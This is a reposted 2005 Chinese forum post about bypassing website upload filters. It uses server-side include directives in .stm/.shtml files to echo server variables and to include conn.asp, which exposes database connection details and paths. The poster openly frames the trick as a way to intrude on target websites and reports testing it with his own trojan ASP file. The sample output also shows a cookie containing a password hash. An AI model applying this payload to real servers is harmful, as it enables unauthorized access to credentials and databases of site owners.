免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2988 | 回复: 0
打印 上一主题 下一主题

当网站不允许上传asp cer cdx htr文件时的一个解决方法! [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-09-03 15:29 |只看该作者 |倒序浏览
一段代码: \n<!--#ECHO var=\"ALL_HTTP\"--><br> \n\n当前文件名称:<!--#ECHO var=\"DOCUMENT_NAME\"--><br><br> \nWeb服务器的名称和版本:<!--#ECHO  \nvar=\"SERVER_SOFTWARE\"--><br> \n主机名:<!--#ECHO var=\"SERVER_NAME\"--><br> \n端口:<!--#ECHO var=\"SERVER_PORT\"--><br> \n客户或客户代理IP地址:<!--#ECHO var=\"REMOTE_ADDR\"--><br> \n客户或客户代理主机名:<!--#ECHO var=\"REMOTE_HOST\"--><br> \nPATH_INFO  \n的值,但带有扩展为某个目录规范的虚拟路径:<!--#ECHO  \nvar=\"ATH_TRANSLATED\"--><br> \n客户端给出附加路径信息:<!--#ECHO var=\"ATH_INFO\"--><br> \n<!--#ECHO var=\"HTTP_ACCEPT\"--><br> \n<!--#ECHO var=\"DOCUMENT_URI\"--><br> \n\n说保存为stm或者shtml看看,运行如下: \nHTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate  \n当前文件名称:F:Web1.stm \nWeb服务器的名称和版本:Microsoft-IIS/5.0 \n主机名:localhost \n端口:80 \n客户或客户代理IP地址:127.0.0.1 \n客户或客户代理主机名:127.0.0.1 \nPATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:Web1.stm \n客户端给出附加路径信息:/1.stm \nimage/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* \n一直不解! \n今天在幻影旅团看到了一段话 \n\n当网站不允许上传\nasp cer cdx htr等文件时, 上传一个stm文件, 内容为:\n<!--#include file=\"conn.asp\"-->\n直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! \n并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!\n原来就是如上所说的,\n<!--#include file=\"conn.asp\"-->\n  就是一条SSI指令,其作用是将\"info.htm\"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。\n我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为:\n<!--#include file=\"ok.asp\"--> \n又在同一目录下放了一个我的一个木马文件ok.asp\n在浏览器中请求test.stm,没有什么反映,一片空白。\n但是一查看源代码,狂晕,原来就是我的asp文件的内容!\n这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径,\n但是一个前提是服务器的对stm或者shtml的扩展没有删除!\n再次感谢lcx大哥的指导! 转
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP